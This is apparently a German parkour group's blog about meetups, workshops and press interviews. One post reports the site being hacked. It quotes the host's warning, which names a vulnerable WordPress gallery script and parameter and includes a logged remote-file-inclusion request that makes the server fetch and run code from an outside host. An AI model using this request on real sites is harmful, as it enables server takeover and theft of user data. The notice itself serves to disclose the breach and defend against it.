Einige von uns haben sich ja für den “the way”-Workshop im November in Berlin angemeldet. Ihr werdet dann ja vermutlich auch die Mail bekommen haben betreffs der Aufteilung des Workshops in zwei Teile: Samstag “Basic-Workshop” (“Solltet Ihr das erste Mal unseren Workshop besuchen und den Sport weniger als ein Jahr betreiben, würden wir Euch die Teilnahme am Basic-Workshop nahe legen. “), Sonntag “Advanced-Workshop”. Ich hoffe, wir können uns als Gruppe auf einen der beiden Tage einigen. Ich persönlich würde beides wohl mitmachen, würde mich aber wohl eher Sonntag wohler fühlen.

Also: Alle, die mitfahren am Besten mal in den Comments ihre Meinung hinterlassen.

Ich schlage für das kommende Wochenende als Zeit wieder 1500 vor. Ort: Alte Mensa auf dem Campus der TU (Mommsenstraße). Erreichbar mit 72, 76 über Haltestelle Mommsenstraße oder 3, 8, 61 über Haltestelle Nürnberger Platz.

Das Treffen am 23. hat dewegen nicht stattgefunden, weil die Interviewerin von der MoPo meine Nachricht über den Treffpunkt nicht erhalten hat (sie hat zuhause kein Netz..). Also machen wir es ihr diesmal einfacher und entscheiden uns bis Donnerstag über den Treffpunkt

Ahoi, Christoph

Auch dieses WE wollen wir uns wieder treffen. Zeit wie üblich 15:00. Treffpunkt: Zwinglistraße (bzw. Rothermundtpark)

Den Termin mit der Presse würde ich erstmal auf Sonntag legen wollen. Je nachdem, an welchem Tag mehr Leute kommen, können wir das auch gern verschieben.

Um chefkoch zu zitieren: “Der Sport ist in Mode..”

Ahoi, Christoph

Da ich leider nur Samstag zeit habe, würde ich da gerne bissl rumspringen. Spotvorschlag: Königsbrücker Platz! 15 uhr

Es gab scheinbar schonmal ein Treffen dort, aber da war ich nicht da und dort soll es

ja ganz angenehm zum turnen sein.

Also es melde sich wer noch Lust hat. Over & Out!

Q

edit 070914 16:04
Wir sind nicht natürlich die einzigen, die diesem Angriff unterlagen. Eine Google Group diskutiert genau das gleiche Script, was bei uns zum Einsatz kam.
/edit

edit 070914,11:52
Seit heute morgen scheint das Problem behoben. Nach dem Neuaufsetzen sämtlicher Dateien, ist der Fremdcode offenbar nicht mehr vorhanden. Daher gilt der Aufruf an alle:
Bitte umgehend das Passwort neu setzen (siehe Ende dieses Eintrages)
Wenn der Angreifer wieder einen Zugang findet, werden wir entweder alle Benutzer löschen oder zumindest in einem Rutsch alle Passwörter auf einen Schlag ändern müssen, wobei es dann das neue Passwort nur gegen eine Anfrage per Mail gibt. Alles sehr, sehr ärgerlich, aber so ist das wahre Leben
/edit

Durch eine Sicherheitslücke in einem php-Script ist es möglich, dass ein Angreifer an Benutzerdaten gelangt ist. Robert hat eine Infomail vom Webhoster an mich weitergeleitet. Hier ein Teil des Inhalts:

[...]
wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.

Es handelt sich um das Script
“/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php”,
welches über den Parameter “myPath” die Ausführung beliebigen Codes
erlaubt.

200.117.61.136 – - [13/Sep/2007:01:10:12 +0200] “GET
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ht
tp://www.iff.coop/…/bre.txt? HTTP/1.1″ 200 689 www.parcour-dresden.de
“-” “Mozilla/3.0 (compatible; Indy Library)” “-”
[...]

Just heute kam auch ein Sicherheitsupdate für Wordpress, dass zwei größere Lücken schließt:

http://www.heise.de/security/news/meldung/95920

Bitte verwendet keine trivialen Passwörter.
Als Anhalt: Mindestens 8 Zeichen lang (besser mind. 10), eine willkürliche Reihenfolge aus Klein-, Großbuchstaben, Ziffern und Sonderzeichen. Es können auch gerne Akronyme verwendet werden, um sich das PW leichter zu merken. Z.B. Welches Scriptkiddie geistert hier seit drei Wochen durch den Blog? -> WSghs3WddB?
Verwendet bitte keine PW, die in einem Wörterbuch zu finden sind. Es ist übrigens auch nicht sinnvoll, diese lediglich in 1337-5p34k umzuwandeln; das können die PW-Cracker mittlerweile auch alle.

Ich denke, Robert wird nochmal eine Info rausgeben, wenn entsprechende Updates eingespielt wurden. Spätestens danach sollten alle Passwörter nochmal neu gesetzt werden.

->Schon passiert. Alles NOCHMAL NEU aufgespielt, Bilder werden teilweise nicht mehr funktionieren, da genau in dem entrprechenden Plugin die Sicherheitslücke war. (Robert)

Gruß, Christoph

Tach allerseits, wie vielleicht der eine oder andere mit-gekriegt hat, wurde die Seite gehackt. Samstag morgen 7 Uhr wurden einige .php Dateien “ergänzt”, so dass die auf eine merkwürdige Seite gezeigt haben. Hab alles neu aufgespielt. Mein Antivir hat da einen Virus gemeldet.

Ansonsten hoffe ich mal, dass das ne krasse Ausnahme war, und das neueste Sicherheitsupdate für Wordpress (so etwas gibts etwa alle 2 Wochen :-/) diese Lücke geschlossen hat.

Wenn die Informatiktraceure Tips haben, her damit!

Ergänzt: Laut Stabil kein Virus!

Holla Dresdner Traceure,

wie schon vor zwei Wochen angekündigt bin ich derzeit in Dresden und würde nach wie vor gerne ein Interview samt Fotos von Euch zu Wege bringen. Berlin und Warschau habe ich nun schon hinter mir und um die Serie jetzt zu einem Abschluss zu bringen wäre ich gerne noch hier dabei.

Da Philipp mir schon mitgeteilt hat ist es derzeit ja wohl wegen dem Wetter etwas ungünstig aber sobald sich da etwas in Richtung Training ergibt bin ich sofort dabei. Ist das ganze morgen (Donnerstag) “nur” ein Interview oder wollt Ihr währenddessen auch noch aktiv werden?

Beste Grüße
benjamin

PS: wer sich grad fragt worum es hier genau geht, ganz unten im Blog ist der ursprüngliche Artikel noch zu sehen

edit
Habe abgesagt, weil sonst keiner von uns da wäre. Derzeit ist der Termin für Samstag, 15:30 bei der Alten Mensa (Mommsenstraße) geplant
Zur Mommsenstraße fahren übrigens die Busse 72, 76.
/edit

Der Lokalteil der Sächsischen Zeitung hat um ein Interview und evtl. Fotos gebeten. Da sie das am WE schon bringen wollen, hab ich erstmal diesen Donnerstag um 16:00 an der ABS vorgeschlagen. Trotz miesen Wetters…

Übrigens – wer sich fragt, was aus dem Artikel für das Stadtmagazin BLITZ! geworden ist – der Artikel kommt am 15.09.
Gruß, Christoph

Hi

Ich wollt gern nochmal wissen, wer kommt am Mittwoch zur akrobatikhalle und geht zu dem Training. ( die beim Flughafen)

Außerdem noch, wie kommt ihr dahin? Und wann genau ist training da?

irgendjemand meinte er würde mich vll mitm auto mitnehmen, passt das noch?

thx unso